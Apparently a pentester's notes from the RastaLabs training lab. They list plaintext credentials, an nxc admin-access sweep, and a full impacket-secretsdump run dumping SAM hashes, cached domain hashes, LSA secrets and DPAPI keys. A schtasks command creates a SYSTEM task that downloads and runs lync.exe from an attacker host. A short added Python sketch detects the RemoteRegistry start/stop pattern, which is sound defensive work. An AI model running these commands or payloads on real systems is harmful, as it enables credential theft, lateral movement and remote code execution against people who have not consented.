RLAB\ahope --> Summer2023 (exchange password 10.10.110.254)

User I have: RLAB\bowen

Home --> \\fs01.rastalabs.local\home$\bowen
Username --> RLAB\Bowen
Password --> NovakDjokovic001

Discovering local admin access

nxc smb 10.10.120.0/24 -u 'bowen' -p 'NovakDjokovic001'

Local admin access on SRV01

Dumping Secrets From SRV01

impacket-secretsdump rlab/bowen:'NovakDjokovic001'@10.10.120.15

┌──(rem01x㉿Rem01x)-[~/…/OSEP/CRTE/ProLabs/RastaLabs]
└─$ impacket-secretsdump rlab/bowen:'NovakDjokovic001'@10.10.120.15
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc8f57878e04b2e206f4b4341a9ab53da
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:eb95d888c9605807f681a8095b86e659:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
RASTALABS.LOCAL/rweston_da:$DCC2$10240#rweston_da#24c8e9ab0617120753dc6d5ea9262ea6: (2022-08-10 21:57:06)
RASTALABS.LOCAL/Administrator:$DCC2$10240#Administrator#4846fb364be3573b565cdf0b9d1798af: (2023-10-19 13:17:51)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RLAB\SRV01$:aes256-cts-hmac-sha1-96:3280d07501f13ab6f9261c65553fcc9e48f573e60aba507bba650ef5733e3539
RLAB\SRV01$:aes128-cts-hmac-sha1-96:1b7a661c7f602c637a0cdeccfa2cd38b
RLAB\SRV01$:des-cbc-md5:5740198661d6d007
RLAB\SRV01$:plain_password_hex:4ae7568032778518d857e7d9ca623dfa7faed688dcd34697e3fcb64c6967ddabcefd8a9d84d9896051c0490b97ebdba9706456af5ed47df94cd47d77dc2a0d1728229153f97fcd4f60080190e37795b2acbbb9d42b3e5729035508e17f7ac7fb2528501f7600255e1fa92175750028f5aab27820f859c9ac7d287aeef4c2cba2eb299337179d6311938e73f0f17e1f58413499e173d2171d4789b70b40b38f0b5402bc0a2b71fa208ade03fdb8b96e6fcea6913df098ab49e5f05e6e52676eb532ee1f2f6977231af335d1b44e174c88681239b6baefa0df3bc162817c42973345d783a4ae8b1a8c5032c9b6e6feaa6e
RLAB\SRV01$:aad3b435b51404eeaad3b435b51404ee:ff6b0335cc1a85d404129df294ce45ab:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x2d5f8e85b7c8cee12b7f5fc25dc1a046a1578121
dpapi_userkey:0xa1821ff66113ccb0a891c59d9ae303cf779c46b1
[*] NL$KM 
 0000   3D 3D E8 3C D1 46 2B 26  15 28 5F D7 F6 60 C4 2C   ==.<.F+&.(_..`.,
 0010   FC 31 A1 08 82 BD 8F 1B  C8 59 44 5C 20 DC AC 54   .1.......YD\ ..T
 0020   54 DE 73 3A 14 1A 39 D3  9D 19 3D 83 1C E6 41 3D   T.s:..9...=...A=
 0030   2E B9 01 9F 68 75 53 A3  C5 75 B4 AC 54 8E 85 3A   ....huS..u..T..:
NL$KM:3d3de83cd1462b2615285fd7f660c42cfc31a10882bd8f1bc859445c20dcac5454de733a141a39d39d193d831ce6413d2eb9019f687553a3c575b4ac548e853a
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
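
Defender's view of the run above, as an added example that is not part of the original notes: the output shows RemoteRegistry being started and stopped again within one session, which on the target appears as a pair of Service Control Manager 7036 events next to a type 3 network logon (4624). The sketch below correlates those events; the dict layout, thresholds, user name and source address are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta

MAX_RUN = timedelta(seconds=120)        # assumed: service is started and stopped within 2 min
LOGON_LOOKBACK = timedelta(seconds=30)  # assumed: network logon shortly precedes the start

# Constructed sample events, already normalized from the System and Security logs.
SAMPLE_EVENTS = [
    {"time": "2023-10-19T13:20:01", "host": "SRV01", "id": 4624,
     "logon_type": 3, "user": "exampleuser", "src": "192.0.2.10"},
    {"time": "2023-10-19T13:20:02", "host": "SRV01", "id": 7036,
     "service": "RemoteRegistry", "state": "running"},
    {"time": "2023-10-19T13:20:09", "host": "SRV01", "id": 7036,
     "service": "RemoteRegistry", "state": "stopped"},
    {"time": "2023-10-19T14:00:00", "host": "SRV02", "id": 7036,
     "service": "RemoteRegistry", "state": "running"},
    {"time": "2023-10-19T18:30:00", "host": "SRV02", "id": 7036,
     "service": "RemoteRegistry", "state": "stopped"},
]

def find_short_remote_registry_runs(events):
    """Flag RemoteRegistry start/stop pairs shorter than MAX_RUN and attach the
    closest preceding network logon (4624, type 3) seen on the same host."""
    started, last_logon, findings = {}, {}, []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t, host = datetime.fromisoformat(e["time"]), e["host"]
        if e["id"] == 4624 and e.get("logon_type") == 3:
            last_logon[host] = (t, e)
        elif e["id"] == 7036 and e.get("service") == "RemoteRegistry":
            if e["state"] == "running":
                started[host] = t
            elif e["state"] == "stopped" and host in started:
                start = started.pop(host)
                if t - start > MAX_RUN:
                    continue  # long-lived run, e.g. legitimate admin use
                logon = last_logon.get(host)
                near = (logon is not None
                        and timedelta(0) <= start - logon[0] <= LOGON_LOOKBACK)
                findings.append({
                    "host": host,
                    "seconds": int((t - start).total_seconds()),
                    "user": logon[1]["user"] if near else None,
                    "src": logon[1]["src"] if near else None,
                })
    return findings

if __name__ == "__main__":
    for f in find_short_remote_registry_runs(SAMPLE_EVENTS):
        print(f)
```

On hosts where RemoteRegistry is disabled by policy, any 7036 "running" event for it is worth an alert on its own.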

Got bowen's flag from his home directory

copy \\fs01.rastalabs.local\home$\bowen\Desktop\flag.txt c:\users\bowen
RASTA{w007_f007h0ld_l375_pwn}

test

schtasks /create /S srv01.rastalabs.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STChecks" /TR "powershell.exe -c 'iwr -uri http://10.10.17.43/lync.exe -outfile c:\\windows\\temp\\lync.exe;c:\\windows\\temp\\lync.exe'"
schtasks /Run /S srv01.rastalabs.local /TN "STChecks"

Found ngodfrey user ASREP

Username --> RLAB\Ngodfrey
Password --> zaq123$%^&*()_+